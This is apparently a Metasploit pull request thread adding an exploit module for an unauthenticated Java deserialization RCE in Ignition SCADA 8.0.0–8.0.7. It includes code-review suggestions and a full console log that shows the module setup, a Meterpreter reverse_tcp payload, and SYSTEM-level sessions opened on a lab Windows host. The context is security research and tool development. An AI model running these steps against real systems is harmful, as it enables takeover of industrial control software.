Add exploit for Ignition Automation remote code execution (Pwn2Own Miami 2020)
rapid7/metasploit-framework pull request #13604
Opened 2020-06-12 04:22 UTC by pedrib

This module exploits a Java deserialization vulnerability in the Inductive Automation Ignition SCADA product, versions 8.0.0 to (and including) 8.0.7.
This exploit was tested on versions 8.0.0 and 8.0.7 on both Linux and Windows.
The default configuration is exploitable by an unauthenticated attacker, which can achieve remote code execution as SYSTEM on a Windows installation and root on Linux.
The vulnerability was discovered and exploited at Pwn2Own Miami 2020 by the Flashback team (Pedro Ribeiro + Radek Domanski).

**NOTE: This exploit does not work on Linux due to a bug in Metasploit's ysoserial payloads for Linux. They don't appear to work. We have confirmed this is a Metasploit bug, not a bug in our module.**

2020-06-12 04:39 UTC, pedrib commented
Tagging @rdomanski

2020-06-12 06:00 UTC, pedrib commented
PS: to add to my note in the original post, the module works fine on Windows. It's the ysoserial Linux payload that fails.

2020-06-12 09:56 UTC, cdelafuente-r7 reviewed
It's great exploit module! Thanks for your contribution.
I just left a few minor comments.

2020-06-12 09:56 UTC, cdelafuente-r7 commented on modules/exploits/multi/scada/inductive_ignition_rce.rb
> +    if version[0].to_i == 8 && version[1].to_i == 0 && version[2].to_i < 8
Another option would be to use `Gem::Version` for version comparisons:
```suggestion
    version = Gem::Version.new(version_get)
    if version.segments.length < 3
      fail_with(Failure::Unknown, 'Failed to obtain target version')
    end
    print_status("#{peer} - Detected version #{version.version}")
    if version >= Gem::Version.new('8.0.0') && version <= Gem::Version.new('8.0.7')
```

2020-06-12 09:56 UTC, cdelafuente-r7 commented on modules/exploits/multi/scada/inductive_ignition_rce.rb
> +    if os =~ /Windows/
I would suggest to avoid regex when it is not necessary:
```suggestion
    if os.include?('Windows')
```

2020-06-12 09:56 UTC, cdelafuente-r7 commented on modules/exploits/multi/scada/inductive_ignition_rce.rb
> +    elsif os =~ /Linux/
```suggestion
    elsif os.include?('Linux')
```

2020-06-12 09:56 UTC, cdelafuente-r7 commented on modules/exploits/multi/scada/inductive_ignition_rce.rb
> +    if version.length >= 3 && version[0] == 8 && version[1] == 0 && version[2] == 0
Same here, I would also use `Gem::Version`.

2020-06-15 09:16 UTC, pedrib commented
@cdelafuente-r7 thanks, I have applied all suggestions!

2020-06-22 12:07 UTC, pedrib commented
@cdelafuente-r7 all resolved and ready to go, what are the next steps?

2020-06-22 12:50 UTC, pedrib commented
also, should I open a bug for the non working ysoserial Linux payloads in msf?

2020-06-22 14:29 UTC, cdelafuente-r7 commented
> @cdelafuente-r7 all resolved and ready to go, what are the next steps?

@pedrib, thank you for your updates. I will test it today and land it if everything runs fine.

2020-06-22 14:30 UTC, cdelafuente-r7 commented
> also, should I open a bug for the non working ysoserial Linux payloads in msf?

yes please, that would be awesome. Thanks!

2020-06-23 04:10 UTC, pedrib commented
Done #13753

2020-06-25 05:25 UTC, pedrib commented
@cdelafuente-r7 need help testing? We're going to push another module today, would like to get this one over the line!

2020-06-25 14:34 UTC, cdelafuente-r7 requested changes
@pedrib, thanks for this great contribution and for creating an issue for the `ysoserial` Linux issue. I apologize for the delay, I was caught in something else and I could only test your module today.

I added some minor comments about the documentation and infohash `References`. Once these are fixed, I will go ahead and land it.

2020-06-25 14:44 UTC, cdelafuente-r7 commented
I tested this module against a Windows 10 version 1909 target. I verified the automatic target selection worked as expected and got a session with SYSTEM user privileges.
I confirmed the Linux target is not working due to an issue in Metasploit's ysoserial (reported [here](https://github.com/rapid7/metasploit-framework/issues/13753)).

```
msf5 exploit(multi/scada/inductive_ignition_rce) > set RHOSTS 172.16.60.202
RHOSTS => 172.16.60.202
msf5 exploit(multi/scada/inductive_ignition_rce) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/scada/inductive_ignition_rce) > set LHOST 172.16.60.1
LHOST => 172.16.60.1
msf5 exploit(multi/scada/inductive_ignition_rce) > set verbose true
verbose => true
msf5 exploit(multi/scada/inductive_ignition_rce) > options

Module options (exploit/multi/scada/inductive_ignition_rce):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   172.16.60.202    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    8088             yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.16.60.1      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(multi/scada/inductive_ignition_rce) > check

[*] 172.16.60.202:8088 - Detected version 8.0.7
[*] 172.16.60.202:8088 - The target appears to be vulnerable.
msf5 exploit(multi/scada/inductive_ignition_rce) > run

[*] Started reverse TCP handler on 172.16.60.1:4444
[*] 172.16.60.202:8088 - Attacking Windows target
[*] Powershell command length: 6591
[*] 172.16.60.202:8088 - Detected version 8.0.7
[*] 172.16.60.202:8088 - Sending payload...
[+] 172.16.60.202:8088 - Success, shell incoming!
[*] Sending stage (201283 bytes) to 172.16.60.202
[*] Meterpreter session 1 opened (172.16.60.1:4444 -> 172.16.60.202:61323) at 2020-06-25 16:27:29 +0200

meterpreter > sysinfo
Computer        : DESKTOP-UUQE0B4
OS              : Windows 10 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > [*] Shutting down Meterpreter...

[*] 172.16.60.202 - Meterpreter session 1 closed.  Reason: User exit
msf5 exploit(multi/scada/inductive_ignition_rce) > set target 1
target => 1
msf5 exploit(multi/scada/inductive_ignition_rce) > options

Module options (exploit/multi/scada/inductive_ignition_rce):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   172.16.60.202    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    8088             yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.16.60.1      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Windows


msf5 exploit(multi/scada/inductive_ignition_rce) > run

[*] Started reverse TCP handler on 172.16.60.1:4444
[*] 172.16.60.202:8088 - Attacking Windows target
[*] Powershell command length: 6111
[*] 172.16.60.202:8088 - Detected version 8.0.7
[*] 172.16.60.202:8088 - Sending payload...
[+] 172.16.60.202:8088 - Success, shell incoming!
[*] Sending stage (176195 bytes) to 172.16.60.202
[*] Meterpreter session 2 opened (172.16.60.1:4444 -> 172.16.60.202:61324) at 2020-06-25 16:28:08 +0200

meterpreter > sysinfo
Computer        : DESKTOP-UUQE0B4
OS              : Windows 10 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

2020-06-25 15:51 UTC, pedrib commented
Should be all clear now

2020-06-25 16:13 UTC, cdelafuente-r7 commented
Great! thanks for these updates! I will land it in a minute.

2020-06-25 16:13 UTC, cdelafuente-r7 approved these changes

2020-06-25 16:16 UTC, merged

2020-06-25 16:18 UTC, cdelafuente-r7 commented
It's merged now. Thanks again for your contribution.
FYI, I just updated the documentation to remove some spaces at EOL and make `msftidy_docs` happy (2203310d64a023f3f4938c98a1afb1f664f6a993).

2020-06-25 16:22 UTC, pedrib commented
thank you!

2020-06-25 16:35 UTC, cdelafuente-r7 commented
# Release Notes
This adds a new module to exploit a Remote Code Execution vulnerability in versions from 8.0.0 to 8.0.7 of the Inductive Automation Ignition SCADA product. Due to multiple issues related to sensitive resource access control, insecure Java deserialization and the use of an insecure Java library, a remote unauthenticated attacker is able to execute arbitrary commands in the context of the SYSTEM user. This module leverages vulnerabilities identified as CVE-2020-10644 and CVE-2020-12004.